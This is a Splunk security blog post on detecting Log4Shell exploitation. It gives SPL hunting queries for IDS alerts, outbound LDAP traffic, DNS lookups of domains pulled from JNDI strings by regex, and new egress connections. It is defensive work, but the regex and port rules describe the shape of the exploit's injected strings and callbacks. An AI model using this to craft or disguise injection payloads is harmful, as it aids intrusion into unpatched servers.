This blog is a part of Splunk's Log4j response. For additional resources, check out the Log4Shell Overview and Resources for Log4j Vulnerabilities page.
Authors and Contributors: As always, security at Splunk is a family business. Credit to authors and collaborators: Ryan Kovar, Shannon Davis, Johan Bjerke, James Brodsky, Dave Herrald, John Stoner, Drew Church, Mick Baccio, Jay Holladay, Lily Lee, Audra Streetman, Tamara Chacon.
Splunk’s SURGe team provided an initial blog and security advisory for Splunk products in relation to Log4Shell, a Log4j vulnerability that’s been keeping blue teams up at night.
In this blog, we provide additional guidance on how to help detect potential exploitation in your environment. If you haven’t already been logging everything needed to detect the initial exploitation, you are still in luck. There are other areas for you to investigate to find out if your hosts have been targeted.
The Swiss CERT published a helpful blog containing a diagram that outlines the various stages of this exploit. The diagram includes some key search areas:
Most of our detections have centered around steps 1 and 2, where the adversary makes the initial JNDI request to the vulnerable server.
What if you aren’t logging that information? Well, phase 3 would be a very good place to start hunting. We can use two key data sources here: Network Traffic and DNS query logs. Let’s take a look at how these two data sources can help us find compromised hosts in our environment.
Don’t forget about your investments in IDS across your environment. Make sure you’ve updated your rules and are indexing them in Splunk. In this case, we are using Suricata but this holds true for any IDS that has deployed signatures for this vulnerability. A quick search against that index will net you a place to start hunting for compromise:
index=suricata ("2021-44228" OR "Log4j" OR "Log4Shell") | table _time, dest_ip, alert.signature, alert.signature_id
Should outbound LDAP traffic be allowed through your perimeter firewall? Probably not. This could be an indication of Log4Shell initial access behavior on your network. Here is a search leveraging tstats and using Splunk best practices with the Network Traffic data model. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.
| tstats earliest(_time) as earliest_time latest(_time) as latest_time values(All_Traffic.dest_ip) from datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port = 1389 OR All_Traffic.dest_port = 389 OR All_Traffic.dest_port = 636 AND NOT (All_Traffic.dest_ip = 10.0.0.0/8 OR All_Traffic.dest_ip=192.168.0.0/16 OR All_Traffic.dest_ip = 172.16.0.0/12) by All_Traffic.src_ip | convert ctime(earliest_time) ctime(latest_time)
We identified detections for JNDI strings that could indicate attempts to exploit the Log4j vulnerability. How can we correlate this to a successful probe? DNS to the rescue.
The first search utilizes regular expressions to extract the domains within the JNDI string. It then updates a lookup table containing these domains that we will use in a follow on search. Keep in mind that this query can take a few more than normal CPU cycles because it operates on unstructured data, so it may take a while depending on the amount of data you are searching. When running this search for the first time, you’ll want to comment out the lookup line in this query to ensure the lookup file is created first.
index=* jndi
| rex field=_raw max_match=0 "[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)(?<proto>\w+)(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?(?<rce_dest>[a-zA-Z0-9\.\-\_\$\{\:]+)"
| mvexpand rce_dest
| rex field=rce_dest "(?<rce_ip>\d+\.\d+\.\d+\.\d+)"
| eval rce_domain = case(isnull(rce_ip),rce_dest)
| rex field=rce_domain "(?<top_level_domain>[0-9a-zA-A\-]+\.[0-9a-zA-A\-]+$)"
| dedup top_level_domain
| eval top_level_domain = "*.".top_level_domain | where top_level_domain!=""
| lookup log4j_scanning_domain.csv query as top_level_domain OUTPUT query AS old_query
| where isnull(old_query)
| rename top_level_domain as query | table query
| outputlookup append=t log4j_scanning_domain.csv
Once the search above is complete, you will have a lookup table with your domains and can run a tstats search using the Network Resolution data model to find any DNS queries that match the domains from the JNDI probes.
| tstats summariesonly=true allow_old_summaries=true values(host) as host, values(DNS.query_type) as DNS.query_type, values(DNS.reply_code) as DNS.reply_code, values(DNS.transport) as DNS.transport count from datamodel=Network_Resolution.DNS where [| inputlookup log4j_scanning_domain.csv | rename query as DNS.query | format] by "DNS.src",sourcetype, DNS.query index _time span=1s | stats earliest(_time) as first_seen, latest(_time) as last_seen sum(count) as count, values(DNS.reply_code) as DNS.reply_code, values(index) as index, values(DNS.src) as DNS.src, values(DNS.query_type) as DNS.query_type, values(DNS.transport) as DNS.transport by host DNS.query sourcetype | convert timeformat="%m/%d/%Y %H:%M:%S" ctime(first_seen), ctime(last_seen)
You can also search for outbound traffic from internal servers (egress) that did not produce outbound traffic before 2021-12-09. To do this, set the time frame to at least 24 hours before 2021-12-09 to include some standard traffic for comparison. The benefit of this extensive, but slow, behavioural search is that you use the widest possible net to catch signs of compromise. Here is a SPL search to get you started:
index=* src_ip=* dest_ip=* (NOT (dest_category="internal" OR dest_ip=10.0.0.0/8 OR dest_ip=172.16.0.0/12 OR dest_ip=192.168.0.0/16 OR dest_ip=100.64.0.0/10)) | stats earliest(_time) as earliest latest(_time) as latest values(action) as action values(app) as app values(dest_port) as dest_port values(sourcetype) as sourcetype count by src_ip dest_ip | eventstats max(latest) as maxlatest ```This is 2021-12-09 00:00:00``` | eval comparisonTime="1639008000" ```| eval comparisonTime="-1d@d" ``` | eval isOutlier=if(earliest >= relative_time(maxlatest, comparisonTime), 1, 0) | convert timeformat="%Y-%m-%dT%H:%M:%S" ctime(earliest),ctime(latest) ,ctime(maxlatest) | where isOutlier=1
This search can be modified in a number of ways.
| tstats summariesonly=false allow_old_summaries=true earliest(_time) as earliest latest(_time) as latest values(All_Traffic.action) as action values(All_Traffic.app) as app values(All_Traffic.dest_ip) as dest_ip values(All_Traffic.dest_port) as dest_port values(sourcetype) as sourcetype count from datamodel=Network_Traffic where (NOT (All_Traffic.dest_category="internal" OR All_Traffic.dest_ip=10.0.0.0/8 OR All_Traffic.dest_ip=172.16.0.0/12 OR All_Traffic.dest_ip=192.168.0.0/16 OR All_Traffic.dest_ip=100.64.0.0/10)) by All_Traffic.src_ip All_Traffic.dest_ip | rename "All_Traffic.*" as * | eventstats max(latest) as maxlatest ```This is 2021-12-09 00:00:00``` | eval comparisonTime="1639008000" ```| eval comparisonTime="-1d@d" ``` | eval isOutlier=if(earliest >= relative_time(maxlatest, comparisonTime), 1, 0) | convert timeformat="%Y-%m-%dT%H:%M:%S" ctime(earliest),ctime(latest) ,ctime(maxlatest) | where isOutlier=1
This is a variation of the tstats version of the previous search. It’s been modified to use a baseline of past activity stored in a lookup. The baseline must be populated initially by running the search with a longer time window, and then it can be kept up to date by running the query more frequently (e.g., once hourly). This approach will keep the baseline up to date with the latest activity in your environment.
Note: The first time you run this search, it will result in an error unless the lookup “egress_src_dest_tracker.csv” is configured. You can prevent this by manually creating an empty lookup with that name or by running the search after temporarily removing this line:
| lookup egress_src_dest_tracker.csv dest_ip src_ip OUTPUT earliest AS previous_earliest latest AS previous_latest | tstats summariesonly=false allow_old_summaries=true earliest(_time) as earliest latest(_time) as latest values(All_Traffic.action) as action values(All_Traffic.app) as app values(All_Traffic.dest_ip) as dest_ip values(All_Traffic.dest_port) as dest_port values(sourcetype) as sourcetype count from datamodel=Network_Traffic where (NOT (All_Traffic.dest_category="internal" OR All_Traffic.dest_ip=10.0.0.0/8 OR All_Traffic.dest_ip=172.16.0.0/12 OR All_Traffic.dest_ip=192.168.0.0/16 OR All_Traffic.dest_ip=100.64.0.0/10)) by All_Traffic.src_ip All_Traffic.dest_ip | rename "All_Traffic.*" as * | lookup egress_src_dest_tracker.csv dest_ip src_ip OUTPUT earliest AS previous_earliest latest AS previous_latest | eval earliest=min(earliest, previous_earliest), latest=max(latest, previous_latest) | fields - previous_* | appendpipe [ | fields src_ip dest_ip latest earliest | stats min(earliest) as earliest max(latest) as latest by src_ip, dest_ip | inputlookup append=t egress_src_dest_tracker.csv | stats min(earliest) as earliest max(latest) as latest by src_ip, dest_ip | outputlookup egress_src_dest_tracker.csv | where a=b ] | eventstats max(latest) as maxlatest | eval comparisonTime="-1h@h" | eval isOutlier=if(earliest >= relative_time(maxlatest, comparisonTime), 1, 0) | convert timeformat="%Y-%m-%dT%H:%M:%S" ctime(earliest),ctime(latest) ,ctime(maxlatest) | where isOutlier=1
This technique uses concepts from the previous search. This time, the difference is that it’s looking for external IPs connecting to internal IPs and enriching the external IPs with the location information. The lookup is based on source, destination, and source country. As with the previous search, it may return a lot of results, some of which may be false positives. You may wish to limit the scope of this search to certain application servers of interest, and you will almost certainly want to exclude desktop systems. The search may be of best use as a hunting query run manually until you are satisfied that it is returning useful results.
The baseline must be populated initially by running the search with a longer time window, then it can be kept up to date by running the query more frequently (e.g., once hourly). This approach will keep the baseline up to date with the latest activity in your environment.
Note: The first time you run this search, it will result in an error unless the lookup “ingess_src_dest_country_tracker.csv” is configured. You can prevent this by manually creating an empty lookup with that name or by running the search after temporarily removing this line:
| lookup ingess_src_dest_country_tracker.csv dest_ip src_ip Country OUTPUT earliest AS previous_earliest latest AS previous_latest | tstats summariesonly=false allow_old_summaries=true earliest(_time) as earliest latest(_time) as latest values(All_Traffic.action) as action values(All_Traffic.app) as app values(All_Traffic.dest_ip) as dest_ip values(All_Traffic.dest_port) as dest_port values(sourcetype) as sourcetype count from datamodel=Network_Traffic where (All_Traffic.dest_category="internal" OR All_Traffic.dest_ip=10.0.0.0/8 OR All_Traffic.dest_ip=172.16.0.0/12 OR All_Traffic.dest_ip=192.168.0.0/16 OR All_Traffic.dest_ip=100.64.0.0/10) AND (All_Traffic.src_category="external" OR (All_Traffic.src_ip!=10.0.0.0/8 AND All_Traffic.src_ip!=172.16.0.0/12 AND All_Traffic.src_ip!=192.168.0.0/16 AND All_Traffic.src_ip!=100.64.0.0/10)) by All_Traffic.src_ip All_Traffic.dest_ip | rename "All_Traffic.*" as * | iplocation src_ip | lookup ingess_src_dest_country_tracker.csv dest_ip src_ip Country OUTPUT earliest AS previous_earliest latest AS previous_latest | eval earliest=min(earliest, previous_earliest), latest=max(latest, previous_latest) | fields - previous_* | appendpipe [ | fields src_ip dest_ip Country latest earliest | stats min(earliest) as earliest max(latest) as latest by src_ip, dest_ip, Country | inputlookup append=t ingess_src_dest_country_tracker.csv | stats min(earliest) as earliest max(latest) as latest by src_ip, dest_ip, Country | outputlookup ingess_src_dest_country_tracker.csv | where a=b ] | eventstats max(latest) as maxlatest | eval comparisonTime="-1h@h" | eval isOutlier=if(earliest >= relative_time(maxlatest, comparisonTime), 1, 0) | convert timeformat="%Y-%m-%dT%H:%M:%S" ctime(earliest),ctime(latest) ,ctime(maxlatest) | where isOutlier=1
Patching is still your best bet to combat this vulnerability. If patching isn’t possible, implementing mitigation techniques is the next best path to minimize the attack surface. SURGe is monitoring the evolution of this vulnerability and will provide additional information as needed. Additionally, Splunk’s Threat Research Team has been working hard to create some detections for ESCU as well as a SOAR playbook for automated response, which will be released as soon as possible.
SURGe by Splunk is a security research team dedicated to providing expert analysis and insights that help customers discover, investigate, and respond to new and emerging threats. Sign up for SURGe Alerts to receive security research and technical guidance.
The Splunk platform removes the barriers between data and action, empowering observability, IT and security teams to ensure their organizations are secure, resilient and innovative.
Founded in 2003, Splunk is a global company — with over 7,500 employees, Splunkers have received over 1,020 patents to date and availability in 21 regions around the world — and offers an open, extensible data platform that supports shared data across any environment so that all teams in an organization can get end-to-end visibility, with context, for every interaction and business process. Build a strong data foundation with Splunk.